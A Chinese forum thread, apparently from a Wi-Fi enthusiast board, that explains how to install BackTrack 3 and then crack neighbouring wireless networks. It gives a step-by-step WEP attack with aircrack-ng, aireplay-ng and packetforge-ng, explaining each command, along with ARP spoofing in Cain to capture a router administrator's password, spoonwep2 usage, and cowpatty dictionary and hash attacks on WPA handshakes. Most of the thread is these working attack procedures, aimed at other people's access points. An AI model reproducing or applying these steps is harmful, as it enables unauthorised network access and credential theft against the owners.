【原创】【文档补齐】bt安装 wep破解 wpa破解 路由密码破解（附软件）

young001

大家看帖 给我回复个 谢谢 这贴是参加活动的  谢谢了 :)
我的文章排的挺乱的 有些在后面 大家往下看看就可以了

有什么问题可以pm我 我会尽可能解答的


我没有截图 我已经做好了 我就拿别人的图用了一下

从使用bt开始破解 个人推荐使用bt3 好像说是比较好 因为更兼容更多的网卡 我成功的破解过
一.当然是下栽bt3了 个人推荐usb版 我倒是不知到具体的差别 但是我在优盘和硬盘下用usb版本都能成功的破解无线密码了
以下是官方网站的下载地址
BackTrack 3 Beta USB version (946 mb)
http://www.offensive-security.com/bt3b141207.rar.torrent
md5sum : bd0d8f507502787184b187f5a39288df
shasum : 853b80a77e3881e8084c797ba55077ead15f84ae

二.安装办法 无非就是两种 安装在硬盘或者是usb的可移动设备上
我先说说安装在在usb上吧
准备一个usb设备 要1g以上的 格式化fat32 这样省空间 好像兼容也是比较好的
接下来是安装部分 很多在论坛里面说是用工具 一个flashboot  一个syslinux 很奇怪 为什么大家都是说用这个工具呢 我用这个工具成功的做过 但是我发现了更加方便的做法 所以工具我就不用了 不过我会给大家附上的 有些人喜欢 呵呵
把bt3iso镜像解压到优盘下 这样你会在优盘下看到两个文件夹 BT3 boot  注意BT3这个文件夹要大写 是小写的改为大写
如下图


现在开始制作：
1：点击开始-运行，输入CMD, 然后回车，进入命令行模式   
如下图
图的意思是cmd默认在C盘documents and settings\小白 这个文件夹下 不管它 小白是自己的计算机的用户名  你输入x：
x就是你的优盘的盘符  下图总优盘盘符是i 所以就输入i： 回车

接下来输入 cd boot 回车

输入 bootinst.bat 回车，就会开始制作BT3


输入bootinst.bat之后出现的情景如下图




开始制作时，会出现这样的画面，大概意思就是，此操作将会重写U盘的
MBR(即引导区)，如果此分区是您的一个硬盘上的分区，那您的Windows系统
将会启动不了，请小心,按Ｘ键中止操作，按其他任意键继续制作　
我就是在Ｕ盘上操作的,所以不用理会，按任意键就可以了







上面的图，是制作完成后的提示，设置引导记录成功，按任意键退出制作　
制作的过程很快，大概不到十秒，其他，他只是重新写了一下Ｕ盘的引导区
就ＯＫ了

到此为止，此Ｕ盘就可以引导系统进去bt3了

上面是用cmd模式 有些人不喜欢 可以使用工具制作   在附件  用工具制作usb启动盘中  我附上了工具和一个word图文文档 大家可以去看一下

usb就制作好了  接下来去bios里面改从usb启动就可以   这里是不懂的机子有些不同的改法  搜一下就行 我就不说了

接下来我说说在硬盘启动的方法  个人推荐使用硬盘启动 usb启动的速度毕竟和硬盘差多了  我用了几下usb的就改为使用硬盘了  差别太大了 可以自己去体会啊 呵呵

硬盘引导有两种情况的 grldr引导 原来c盘下有了grldr和没有grldr这两种情况的 安装过linux的或者是ghost的 硬盘下就会有grldr的  
先讲讲没有grldr的情况 我想大多数人也是这种情况的  

先把bt3中的两个文件夹放到C盘根目录下 接下来吧我上传附件 硬盘引导 总的grldr 和menu.lst放到C盘下 编辑boot.ini
加入一句c:\grldr="start grub"   把grub文件夹复制到boot中    这样重启的时候就可以看到选择了 选择 start grub 就可以进入bt3了  没有截图 不过在附件中有图 大家不用担心 我讲的是思路 看看附件总的pdf文档就很清楚了 （这是论坛中一位兄弟做的 我就是把它写出来）

上面的办法只能把bt解压到c盘  有局限性

下面有办法可以让bt3从任何盘启动   我不多说 在我的附件  从任何盘启动中讲的非常详细 可以看一下

还有就是有grldr的  如果安装过ghost  这样启动bt3就十分方便了
以下这篇文章可以看一下 已经很清楚  我就不多说了
http://forum.anywlan.com/viewthread.php?tid=16198&highlight=ghost


启动篇制作篇我就讲到这里 大家支持的话 我会讲一下破解  大家有什么不懂可以回帖 我会给大家回复的  我这贴想参加送书活动 大家支持一下 多回贴啊  谢谢了

young001

手动破解 附 命令行的解释


其实我就是总结别人的结合起来给大家一个思路
Bt3手动破解wep
1) ifconfig –a
主要查看自己网卡的mac地址 记下来 下面有用
2) airmon-ng start wifi0 6
这个命令用于将自己的无线网卡置于Monitor 这样我们的网卡才可以抓包
3) airodump-ng --ivs -w name -c 6 ath1
这个命令比较关键，你运行以后，就会列出所有该频道的AP。
其中，6 是指你需要监控的频道，必须和第二个命令里的一样， ath1是刚才第二步出现的别名。
这个命令运行以后，显示的内容比较多，简单介绍一下：
BSSID : 其实就是AP的Mac 地址
PWR： AP信号的大小，一般，低于10，就比较麻烦了，丢包情况严重，比较难破解
RXQ： 干扰的大小
Beacons：发送接受的包，参考信息，在跳说明有数据
#Data： 这个比较重要，是接受到可以用来破解的特殊包，如果一直不变，那么，说明没有客户端连接，破解可能很麻烦，如果对方有大文件在下载，那么这个跳的速度非常快，10来分钟就可以有足够的包来破解了，如果跳得很慢，那么，就需要用一些特殊的方式来破解了。
CH：频道
MB：网络连接速度 54就是54MB
ENC， CIPHER，AUTH
这些是加密方式，我们这次只讨论显示为
WEP 和 WEP+ OPN的
如果显示 WPA TKIP 啥的，只能密码穷举破解，个人认为希望不大。
ESSID： 这个是AP的名字，需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解，可以用中文的ESSID
过一会儿，下面会显示哪些客户端连接到了哪些AP，针对有些Mac地址加密的，很容易模拟对方客户端的Mac从而骗进去，所以不要简单地相信Mac限制功能。
这个窗口就开着好了，不用关闭，以后的命令，需要重新打开一个终端窗口操作。
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXXXX ath1
这一步开始，我们要做一些真正的破解工作，主要是针对那些客户端仅仅连接，没什么流量的AP，这种AP，#Data的增长非常慢，往往需要很长的时间才有可能取得足够的包（一般5位的密码需要10000个包左右，更多的密码就要更多的。。。。）这个时候就需要 aireplay-ng 出面了，顾名思义，这个软件就是 Replay，也就是说，模拟发包。

首先解释命令：
-e ap_essid
就是
-e 之后加上你需要破解的essid ，比如 TP-LINK ， linksys 啥的，注意大小写。
-a ap_mac
就是
-a 之后加上你需要破解的AP的Mac地址，第三步BSSID就可以看得到。不需要 ：哦。
-h XXXXXXXXXX 就是 -h 之后，加上你的无线网卡的 Mac地址， 在第一步你可以得到。
ath1 ，上面解释过了。
一个样板例子：
aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 ath1

young001

5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXXXX ath1
上一条成功以后，我们需要开始收集那些需要的数据包，才能够进行模拟，并且破解。
所谓的需要的数据包，就是 #Data的数据，如果 #Data一直是0，那么可能会很麻烦，最好的情况是 #Data缓慢增长的这种情况。

解释一下
-b ap_mac 就是你需要破解的AP的Mac 地址，从第三步那里的 BSSID可以找得到。
-h XXXXXXXXXX
就是你自己网卡的Mac地址。
Ath1 和上面一样。。。。。

这一条命令的执行，和#data包有关，如果#Data 没有增加，则这个命令会一直执行，直到捕获一个#Data包。
捕获以后，程序会问你是否需要用这个包来模拟攻击。回答Y即可。
如果攻击成功，则会显示成功，失败往往是因为信号太差造成的， 如果攻击失败（往往是捕获的包有问题），程序重试N次以后，或自动重新开始捕捉包，继续进行即可。

等成功完成以后，会显示一个文件名：fragment-XXXXX-XXXXXX.xor
这个文件名，XXXXX里面是数字，是一个文件。马上会用得到。

这一步是最有可能失败的一步，尽量保持信号好一点。
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXX.xor -w mrarp
第六步，参数比较多，解释一下：
-a ap_mac 是待破解的AP的Mac地址，
-h XXXXXXXXX 是你自己的无线网卡Mac地址
fragment-XXXXX-XXXXXX.xor
就是第五步显示的那个文件名。
这一步会很快做完， 显示生成文件到 mrarp啥的，其实就是破解包的准备过程
7) aireplay-ng -2 -r mrarp -x 1024 ath1
这一步没哈可以修改的，参数解释一下
ath1 是 你的无线网卡的名字
1024 是攻击速度，1024是最大值了，如果你的无线网卡不是MiniPCI的，个人建议设为 512 ，这样不容易死机。

当这一步开始执行，你会看到 第一个终端窗口里面，你破解的那个AP后面的
#Data在飞速增长，一般是 200个/s的速度，我们只需等待即可
8) aircrack-ng -n 64 -b ap_mac name-01.ivs
们可以新打开一个终端窗口，当 #Data达到 10000个的时候，就可以测试破解了，很多密码都可以 10000左右#Data就算出来
新窗口中运行：
aircrack-ng -n 64 -b ap_mac name-01.ivs
解释一下，
-b ap_mac 对方AP的Mac地址
name-01.ivs 其实是第三步自动生成的一个文件， 如果你多次运行了第三步，那么，可能会生成多个 name-XX.ivs文件， 你可以到对应的文件夹里看一下（就在桌面上的第一个文件夹图标里），找到XX最大的那个，就是你当前正在使用的这个文件。

-n 64 是指破解64位的密码,如果10万以上Data都破解不出来,那就试试 -n 128,估计这个兄弟用了128位加密。

运行以后，如果运气好，一会儿就会显示破解出来的密码，同时会显示 对应的Assic码，如果不是标准Assic码，就是一串数字，记录下来，搞掂。
运气不好的情况，这个程序会继续等待更多的#Data，等到了，就会重新计算一次密码。

cjf

我是一只菜菜鸟，可要好好学习

jxj

新手刚来 学习了

young001

破解路由密码手动加工具

http://forum.anywlan.com/thread-19252-1-1.html
这个帖子上有路由密码破解软件 用软件加载用户名密码文件就可以  还有一个密码生成软件 效率高  成功率还是不错的  
当然还可以用cain监听路由密码  嘿嘿

用cain监听路由密码

我给大家传过用暴力破解路由密码的软件

但是毕竟是暴力破解 成功率还是不太高 我们可以用cain来嗅探对方的用户名密码
原理就是让它下线重新连接的时候
我们截获一下

首先点击配置窗口，选择要嗅探的网卡，当然前提是你安装了Win_pcap 驱动。然后

选择嗅探任务，点下方黄色的ARP 图标，进入ARP 窗口。点击左上角黄色的图标开始嗅探，

在右边上方很大的框中任意点击一下，再点十字图标，在弹出的对话框中左边选择网关，右

边选择你要欺骗的IP，最后再点确定。当一切设置好后你就开着电脑，运行Cain，乖乖地等

待管理员登录吧，只要管理员登录了路由器，Cain 就会自动捕捉到管理员登录帐号和密码。

选中下方的获取密码菜单，即可清楚地看到管理员刚才登录的帐号和密码了

young001

最简单的就是使用spoonwep软件 这样是傻瓜式的
开始-backtrack->radio network analysis->80211->all->spoonwep2
启动spoonwep2后会看到选择网卡信息设置窗口，需要我们依次设置本地网卡接口，无线网卡芯片类型以及扫描模式
　　第二步：由于无线网卡在本地属于WIFI0，所以通过下拉菜单选择即可，同时如果我们不知道自己无线网卡的具体心片类别的话在driver处选择normal即可，最后是MODE类别选择unknown victim即可，点NEXT按钮继续

　　小提示：
　　作为扫描攻击端我们事先并不清楚对方WEP加密的密码是多少，所以在模式类别处选unknown victim。
　　第三步：点NEXT按钮后进入到具体扫描窗口，我们点右上角的LAUNCH按钮开始扫描，再按该按钮是停止扫描

　　第四步：扫描过程中会自动罗列出找到的无线网络BSSID信息，传输速度，截获的通讯数据包大小，使用的无线信号频端，加密类别等。

第五步：通过扫描找到我们要破解WEP密钥的那台无线路由器发布的无线网络，然后选中他查看连接该无线网络的客户端以及数据通讯情况，之后点下面的“selection ok”按钮。

　　第六步：接下来是选择监听的类别，一共有四种方式提供给我们，我们通过上面的下拉菜单选择即可，就个人经验来说选择第二个，第三个和第四个破解都是可以的。选择完毕后点左边的launch按钮开始破解。

　　第七步：经过一段时间无线数据包的监听积累Spoonwep2会自动分析数据并破解出我们想要的无线网络对应的WEP密钥。正如本图所显示的WEP KEY是1234567890，和我们之前设置的WEP密钥是完全吻合的。

boopii

傻瓜的问题  把mp4  当u盘 可不可以啊？

苏一丁

学习了，谢谢！！！

kelvinlok

感謝分享, 慢慢學習

young001

8# boopii

是usb设备的话 格式化成fat32格式的话 应该是可行的

young001

Wpa破解

其实到目前为止 破解wpa还是比较有难度的 这里提出来主要是研究之用
论坛里面无线破解的dvd这样还是为破解wpa成功提供了可能性

先讲讲传统的用密码破解
我只是讲下思路因为基本上用密码文件破解的成功率微乎其微

用ethereal来嗅探 eapol过滤 这样另存为cap文件 比如是wpa.cap

在bt下 把wpa.cap保存到root下

命令行为cowpatty –f password.txt –r wpa.cap –s essid –v

password.txt是密码文件 用词典软件生成

wpa.cap就是嗅探保存到文件

essid是需要破解的ap的essid

-v是显示过程

下面就是使用论坛的方法了

用hash破解

跟传统的还是比较像的

Cowpatty –d dlink.hash –r wpa.cap –s ssid

这样的速度比传统的快多的多了

这些在我的附件 光盘的文档中有具体的显示 大家可以参考一下

附件中是光盘中一些文档

对于破解wpa可是很有用的 可以看看